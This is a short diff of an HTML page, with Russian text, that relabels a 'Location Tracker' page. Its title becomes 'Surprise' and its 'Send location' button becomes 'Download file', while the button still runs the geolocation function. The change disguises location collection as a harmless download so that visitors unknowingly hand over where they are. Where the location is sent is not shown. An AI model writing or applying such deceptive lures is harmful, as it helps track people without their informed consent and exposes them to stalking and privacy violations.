--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Location Tracker</title>
+    <title>Сюрприз</title>
     <script>
         function getLocation() {
             // Проверяем поддержку Geolocation API
@@ -41,8 +41,8 @@
     </script>
 </head>
 <body>
-    <h1>Location Tracker</h1>
-    <p id="status">Нажмите кнопку ниже, чтобы отправить своё местоположение.</p>
-    <button onclick="getLocation()">Отправить местоположение</button>
+    <h1>Сюрприз</h1>
+    <p id="status">Нажмите кнопку ниже</p>
+    <button onclick="getLocation()">Скачать файл</button>
 </body>
 </html>
